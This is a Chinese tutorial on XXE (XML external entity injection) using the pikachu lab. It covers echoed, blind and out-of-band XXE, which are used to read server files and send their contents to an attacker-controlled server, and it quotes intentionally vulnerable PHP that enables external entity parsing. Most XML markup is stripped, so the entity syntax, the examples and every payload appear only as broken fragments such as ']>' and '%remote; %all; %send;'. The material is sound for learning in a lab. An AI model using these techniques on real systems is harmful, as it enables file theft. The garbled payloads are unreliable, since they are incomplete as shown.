XXE漏洞知识整理

XXE -"xml external entity injection"
既"xml外部实体注入漏洞"
攻击者可以注入XML实体内容，并由服务器解析执行，从而引发问题。
该漏洞通常被用来读取服务器本地文件。

0x00 什么是XML

XML 指可扩展标记语言（EXtensible Markup Language）
XML 是一种标记语言，很类似 HTML
XML 的设计宗旨是传输数据，而非显示数据
XML 标签没有被预定义。您需要自行定义标签。
XML 被设计为具有自我描述性。
XML 是 W3C 的推荐标准

XML与HTML的区别：
XML 不是 HTML 的替代。
XML 和 HTML 为不同的目的而设计：
XML 被设计为传输和存储数据，其焦点是数据的内容。
HTML 被设计用来显示数据，其焦点是数据的外观。
HTML 旨在显示信息，而 XML 旨在传输信息。

XML的结构:

]>



George
John
Reminder
Don't forget the meeting!

DTD实体（XXE攻击关键）：
实体是用于定义引用普通文本或特殊字符的快捷方式的变量。实体可在内部或者外部声明。
内部引用：
外部引用：

实体又分为一般实体和参数实体
1，一般实体的声明语法:
引用实体的方式：&实体名；
2，参数实体只能在DTD中使用，参数实体的声明格式：
引用实体的方式：%实体名；

0x01 带回显的XXE攻击 (Normal XXE)

使用靶场：pikachu
查看一下关键代码：

$html='';
//考虑到目前很多版本里面libxml的版本都>=2.9.0了,所以这里添加了LIBXML_NOENT参数开启了外部实体解析
if(isset($_POST['submit']) and $_POST['xml'] != null){
   $xml =$_POST['xml'];
   $data = @simplexml_load_string($xml,'SimpleXMLElement',LIBXML_NOENT);
   if($data){
       $html.="
{$data}
";
   }else{
       $html.="
XML声明、DTD文档类型定义、文档元素这些都搞懂了吗?
";
   }
}

simplexml_load_string() 函数转换形式良好的 XML 字符串为 SimpleXMLElement 对象，同时开启了外部实体解析，没有做任何过滤。
那么通过payload：

]>
&hacker;

便可实现任意文件读取

image.png

0x02 无回显的XXE攻击 (Blind XXE)

修改一下代码，不回显数据：

$html='';
//考虑到目前很多版本里面libxml的版本都>=2.9.0了,所以这里添加了LIBXML_NOENT参数开启了外部实体解析
if(isset($_POST['submit']) and $_POST['xml'] != null){
   $xml =$_POST['xml'];
   $data = @simplexml_load_string($xml,'SimpleXMLElement',LIBXML_NOENT);
   if($data){
       // $html.="
{$data}
";
       $html.="
解析成功
"
   }else{
       $html.="
XML声明、DTD文档类型定义、文档元素这些都搞懂了吗?
";
   }
}

构造payload让服务器发送请求到我们的服务器确认存在xxe漏洞，过程服务器端可能会出错，但服务器确实是发送了请求。

%remote;
]>
test

0x03 无回显的XXE攻击 (Blind OOB XXE)

若想将%参数的内容直接放到url里面会报错的，想使用该方法就需要引用外部实体
首先在攻击服务器上写下blind_xxe.php文件：

写入外部实体文件，test.xml:

">

然后在靶机提交一下payload

%remote;
%all;
%send;
]>
test

注意先引用%all后再引用%send,test.xml中单引号中的‘%’号需要进行实体编码，这样就可以在无回显的情况下读取服务器文件了